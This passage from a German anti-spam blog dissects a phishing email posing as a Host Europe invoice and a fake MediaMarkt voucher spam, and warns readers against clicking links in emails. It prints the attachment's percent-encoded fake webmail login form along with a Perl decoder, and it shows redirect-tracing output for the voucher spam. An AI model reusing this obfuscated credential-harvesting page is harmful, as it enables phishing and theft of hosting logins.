3%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%64%61%6E%67%65%72%22%20%69%64%3D%22%6D%73%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%49%6E%76%61%6C%69%64%20%50%61%73%73%77%6F%72%64%2E%2E%21%20%50%6C%65%61%73%65%20%65%6E%74%65%72%20%63%6F%72%72%65%63%74%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%69%64%3D%22%65%72%72%6F%72%22%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%64%61%6E%67%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%54%68%61%74%20%61%63%63%6F%75%6E%74%20%64%6F%65%73%6E%27%74%20%65%78%69%73%74%2E%20%45%6E%74%65%72%20%61%20%64%69%66%66%65%72%65%6E%74%20%61%63%63%6F%75%6E%74%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%75%73%65%72%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%61%69%22%20%69%64%3D%22%61%69%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%55%73%65%72%6E%61%6D%65%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%70%61%73%73%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%72%22%20%69%64%3D%22%70%72%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%66%6F%72%6D%62%75%74%74%6F%6E%73%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%69%64%3D%22%73%75%62%6D%69%74%2D%62%74%6E%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%20%6D%61%69%6E%61%63%74%69%6F%6E%20%73%75%62%6D%69%74%20%62%74%6E%20%62%74%6E%2D%70%72%69%6D%61%72%79%20%62%74%6E%2D%6C%67%20%74%65%78%74%2D%75%70%70%65%72%63%61%73%65%20%77%2D%31%30%30%22%3E%4C%6F%67%69%6E%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%21%2D%2D%20%4F%70%74%69%6F%6E%61%6C%20%4A%61%76%61%53%63%72%69%70%74%20%2D%2D%3E%0A%20%20%20%20%3C%21%2D%2D%20%6A%51%75%65%72%79%20%66%69%72%73%74%2C%20%74%68%65%6E%20%50%6F%70%70%65%72%2E%6A%73%2C%20%74%68%65%6E%20%42%6F%6F%74%73%74%72%61%70%20%4A%53%20%2D%2D%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%32%2E%31%2E%73%6C%69%6D%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4B%4A%33%6F%32%44%4B%74%49%6B%76%59%49%4B%33%55%45%4E%7A%6D%4D%37%4B%43%6B%52%72%2F%72%45%39%2F%51%70%67%36%61%41%5A%47%4A%77%46%44%4D%56%4E%41%2F%47%70%47%46%46%39%33%68%58%70%47%35%4B%6B%4E%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%64%6E%6A%73%2E%63%6C%6F%75%64%66%6C%61%72%65%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%70%6F%70%70%65%72%2E%6A%73%2F%31%2E%31%32%2E%39%2F%75%6D%64%2F%70%6F%70%70%65%72%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%41%70%4E%62%67%68%39%42%2B%59%31%51%4B%74%76%33%52%6E%37%57%33%6D%67%50%78%68%55%39%4B%2F%53%63%51%73%41%50%37%68%55%69%62%58%33%39%6A%37%66%61%6B%46%50%73%6B%76%58%75%73%76%66%61%30%62%34%51%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%30%2E%30%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4A%5A%52%36%53%70%65%6A%68%34%55%30%32%64%38%6A%4F%74%36%76%4C%45%48%66%65%2F%4A%51%47%69%52%52%53%51%51%78%53%66%46%57%70%69%31%4D%71%75%56%64%41%79%6A%55%61%72%35%2B%37%36%50%56%43%6D%59%6C%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%32%2E%32%2E%34%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%73%74%61%63%6B%70%61%74%68%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%31%2E%33%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
</html>
$ _

…ein Javascript-Programm, das ein HTML-Dokument erzeugt. Warum man das nicht direkt in HTML schreibt? Weil man etwas zu verbergen hat, natürlich. Denn selbstverständlich kann man so etwas direkt in HTML schreiben, nur, dass es dann auch jeder ohne Probleme lesen könnte und dass dann Antivirus-Schlangenöle leichtes Spiel haben. So muss ein interessierter Leser ein paar Umwege machen, wenn er neugierig wird. 🛠️

$ cat decr.pl
$l = <>;
$l =~ s/^.*\'([^\']*)\'.*$/\1/;
foreach (split /%/, $l) { printf "%c", hex($_); }
$ cat Rechnung-137784.html | grep unescape | perl decr.pl

Ja, ich weiß: Perl sieht einfach nur schrecklich und unlesbar aus, aber es tippt sich schnell. 😉️

Und nein, so große Umwege sind es nicht. Ich habe mir schon Schlimmeres angeschaut. Aber es übersteigt eben die Kenntnisse gewöhnlicher Anwender erheblich. Und das ist der Zweck der Übung. 🎭️

Ich erspare hier jetzt mal die 4546 Byte lange HTML-Ausgabe dieses winzigen Skriptes und komme auf den Punkt. Man soll im generierten Dokument einen Usernamen und ein Passwort angeben. Diese werden jedoch nicht zu HostEurope gesendet, sondern zu einer Website in der Domain mailbusinessionos (punkt) com, die ganz sicher nichts mit HostEurope zu tun hat. (Der Hoster war inzwischen so nett, dieser Phishing-Site den Stecker zu ziehen.) Danach haben kriminelle Phisher die Zugangsdaten für das Webhosting anderer Leute, und sie werden dort alles tun, was ein gutes Geschäft für kriminelle Phisher ist: Vom Betrugsshop über weiteres Phishing bis hin zu Darstellungen sexuellen Kindesmissbrauchs. Und wer hat für diese Verbrechen die Kriminalpolizei vor der Tür stehen? Richtig: Die arme Seele von Domaininhaber und Website-Betreiber, die auf ein Phishing reingefallen ist. 🎣️

Sollten Sie Fragen zu Ihrer Rechnung oder Ihrem Vertrag haben, helfe ich Ihnen gerne weiter.

Wer sich fragt, wie man verhindern kann, auf so etwas reinzufallen: Das ist sehr einfach, und man braucht dafür weder spezielle Software noch muss man besondere Kenntnisse haben. Niemals in eine E-Mail klicken! Auch nicht, um einen Anhang zu öffnen! Wenn man solche Websites wie die seiner Bank, seines Händlers, seines Webhosters etc. als Lesezeichen im Webbrowser ablegt und nur über das Lesezeichen im Webbrowser aufruft, kann einem kein Krimineller einen vergifteten Link unterschieben. Nach einer solchen Mail einfach die Website über das Lesezeichen aufrufen. Dieses bisschen Vorsicht, das nichts kostet und mit keinem Komfortverlust verbunden ist, kann viel Geld und jahrelangen Ärger ersparen. Und es ist sehr einfach. Aber das erwähnte ich ja schon. 🛡️

Also: Lasst die Phisher verhungern! Keiner vermisst sie. ⚰️

Ihr

Host Europe GmbH
Kundenservice

Host Europe GmbH • Hansestr. 111 • 51149 Köln •
Gerichtsstand: HRB 28495 • Amtsgericht Köln • Umsatzsteuer.-ID: DE187370678
Geschäftsführer: Paul Ashcroft, Tim Montag, Michele Lau, Nicholas Daddario

Wie schon gesagt: HostEurope hat mit dieser Spam nichts zu tun.

Euer Nachtwächter!

Diese Phishing-Spam aus dem täglichen Klo ist ein Zustecksel meines Lesers A. H.

gammelfleisch, dein MEDIAMARKT-Gutschein wartet auf dich, noch interessiert?

Freitag, 29. April 2022

Nein, ich war daran noch nie interessiert.

Ihr MediaMarkt 1.000€ Gutschein  + Samsung Galaxy S21 Ultra 5G + Galaxy Watch

Toll, dass der nicht nur zu 72 % gratis ist, sondern zu 100! 💯️

Aber Computer, auf denen mir nicht das Recht eingeräumt werden soll, selbst darüber zu entscheiden, welche Software ich darauf ausführe, will ich nicht. Ich verzichte dankend darauf, eine Wanze und einen Botrechner durch mein Leben zu tragen. Auch wenn das Reklamebild noch so geil aussieht. Die ganze Kultur rund um diese Smartphones ist giftig und fies. Und Geräte, bei denen mir sogar das Recht vorenthalten werden soll, das wichtigste Verschleißteil Akku austauschen zu können, dürfen sich die Hersteller gepflegt in den Arsch schieben. Mit nicht abschaltbarem Vibrationsalarm. Ich habe keinen Bedarf an fabrikneuem Müll. Die giftigen Müllberge vor den Städten sind mir hoch genug. Die Frage, was jemand, der immer mit seinem Handy rumläuft, zusätzlich mit einer Armbanduhr soll, konnte mir auch noch niemand beantworten. Ich brauche jedenfalls keine Armbanduhr. Und ich habe nicht einmal ein so genanntes „Smartphone“. 💩️

Der ALT-Text für diese Grafik ist übrigens: „500-Euro-Mediamarkt-Gutscheins“. Immer wieder schön, einen Genitiv zu sehen. 👍️

Hallo gammelfleisch

Genau mein Name! 👍️👍️👍️

Du wurdest heute unter den drei möglichen Gewinnern der 1000-Euro-Mediamarkt-Geschenkkarte ausgewählt. Damit kannst du nach Herzenslust auf Shoppingtour gehen. Im Markt selbst und natürlich online.

Aha, ich wurde also unter möglichen Gewinnern eines Gewinns ausgewählt. Und als „möglicher Gewinner“ kann ich meinen möglichen Gewinn so richtig toll verprassen. Denn wenn ich solche Vorstellungen entwickle, schiebe ich mir einen Einkaufswagen in den Kopf, werfe dafür mein Gehirn ins Klo und mache alles, was Spammer gern von mir hätten. 🛒️🧠️

Dazu hast du auch Chance das neuste Samsung Galaxy S21 und Galaxy Watch zu gewinnen.

Und nicht nur das! Ich kann auch noch Dinger gewinnen, die ich gar nicht haben will, wenn ich Dinger gewinne, die ich gar nicht haben will. Ich habe übrigens auch die Chance, dass mir im Verlauf des heutigen Tages ein Meteorit auf den Kopf fällt. Das ist ein sehr seltenes Ereignis, deutlich unwahrscheinlicher als der Tod durch Blitzschlag oder der Sechser mit Superzahl im Lotto, aber ich halte dieses sehr seltene Ereignis für wahrscheinlicher als einen Gewinn bei einem „Gewinnspiel“, das von Spammern in asozialer und illegaler Spam angeboten wird.

Natürlich hat MediaMarkt mit dieser Spam nichts zu tun. Die Spam wurde über eine russische IP-Adresse versendet und hat niemals einen Server von MediaMarkt auch nur aus der Nähe gesehen. Die Grafik mit Gutschein, Uhr und Wischofon wird auch nicht auf einem Webserver in der Domain von MediaMarkt gehostet, sondern in der ungleich weniger Vertrauen einflößenden Domain gewinnerwelt (punkt) de, deren Webserver übrigens…

$ lynx -dump https://gewinnerwelt.de/
                                404 – not found
$ mime-header https://gewinnerwelt.de/
HTTP/2 200 
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: PHPSESSID=bb654a13c57459fa9a243aa2114f2024; path=/; secure; HttpOnly
content-type: text/html; charset=utf-8
date: Fri, 29 Apr 2022 09:14:42 GMT
server: Apache
$ _

…vorgibt, keine Inhalte zu haben, aber den angeblichen Fehler nicht als HTTP-Statuscode zurückgibt¹, sondern lediglich als vorsätzlich irreführenden Text in einem ohne Fehler ausgelieferten Dokument für „interessierte Besucher“ einer Website, die von Kriminellen verwendet wird. So einen Mummenschanz haben normale Website-Betreiber gar nicht nötig, und wenn sie eine derartige Website gewerblich betrieben, würde auf der Startseite mindestens ein Impressum verfügbar sein. Warum? Weil es in gewerblicher Nutzung gesetzliche Pflicht ist. ⚖️

Verschwende keine Zeit!
Das Angebot gilt nur noch diese Woche und nur in Deutschland.

Also in Deutschland werde ich ja noch ein bisschen bleiben, aber… ES IST JA SCHON FREITAG!!! Bloß nicht nachdenken, sondern ganz schnell klicken! In eine Spam. Es gibt auch…

Klick hier, um sich einen der verbleibenden Geschenkkarte + Samsung S21 + Galaxy Watch zu sichern!

…lecker lecker Köder. 🎣️

Und wer bei ersten Klickelink danebengeklickt hat…

» Jetzt teilnehmen «

…bekommt noch eine zweite Chance. 👍️

Natürlich ist der Link nicht direkt gesetzt, wir haben es ja mit krimineller Spam zu tun. Man landet erst in der dritten Weiterleitung auf einer Website…

$ location-cascade https://link.nn.ru/tTd
     1	https://wenkerjam.com/?a=4616&oc=15121&c=42077&m=3&s1=
     2	https://coyote.deepcdntrace.com/autocreate,24,09,2021,de,media_503.html?idPartner=32&idCampaignAd=0&subId=248386437&subIdentifier=4616&utm_source=Lola
     3	https://media.gewinnerwelt.de/campaign_502.html?coyoteAffiliTokenId=27963877&utm_source=Lola&
$ _

…auf der es – wie eben schon gezeigt – angeblich keine Inhalte auf der Startseite gibt. Alle Daten, die man dort unter dem künstlichen Stress einer tick-tack herunterzählenden Uhr zusammen mit einer klicki-klicki Zustimmung zum Datenhandel und zur Vergiftung des Lebens mit Reklamemails eingibt² und absendet, gehen direkt an spammende Kriminelle. Den „möglichen Gewinn“ wird es nicht geben. Stattdessen werden in den im Folgenden dargestellten Seiten rd. zehn weitere, sehr fragwürdige Gewinnspiele angeboten. Und wenn man die Maus bewegt, werden ebenfalls fragwürdige Gewinnspiele angeboten. Und wenn man hinterher eine Kollektion aktueller Schadsoftware auf seinem Computer installiert bekommen hat, wäre ich darüber nicht überrascht. 😐️

Es sind eben Verbrecher. Sieht man ja schon an der Spam. Und weil es Verbrecher sind, klickt man nicht in eine Spam. Ganz einfach. 😉️

Aber dem Spammer will auch ich gern einen Gutschein anbieten:

Gutschein -- Der Inhaber darf mich bei Vorlage dieses Gutscheines kostenlos und unverbindlich am Arsche lecken -- Der Nachtwächter

¹Der HTTP-Statuscode hier ist 200, sichtbar in der ersten Zeile des Headers. Er steht für eine erfolgreiche, fehlerfreie Operation, deren Ergebnis nach den Headern übertragen wird. Dass das Dokument in der Vergangenheit ungültig wird, in diesem Fall sogar schon im Jahr 1981, ist übrigens nicht ungewöhnlich, sondern ein häufiger „Hack“, der die Auslieferung des Inhaltes aus einem Cache verhindern soll. Einige Zugangsprovider fallen immer wieder dadurch auf, dass sie ihren Kunden statische Webseiten, also auf einem Webserver abgelegte HTML-Dokumente, auch noch Wochen nach einer Änderung in veralteten Versionen liefern. In der Bundesrepublik Deutschland hatte man derartige Probleme außerordentlich häufig mit T-Online.

²Wer so etwas ausprobieren möchte: Fake Name Generator verwenden! Die Namen, Anschriften, Kreditkartennummern und Mailadressen existieren garantiert nicht. Das heißt: Die Mailadressen schon, aber es sind Fake-Adressen, die jeder mitnutzen kann.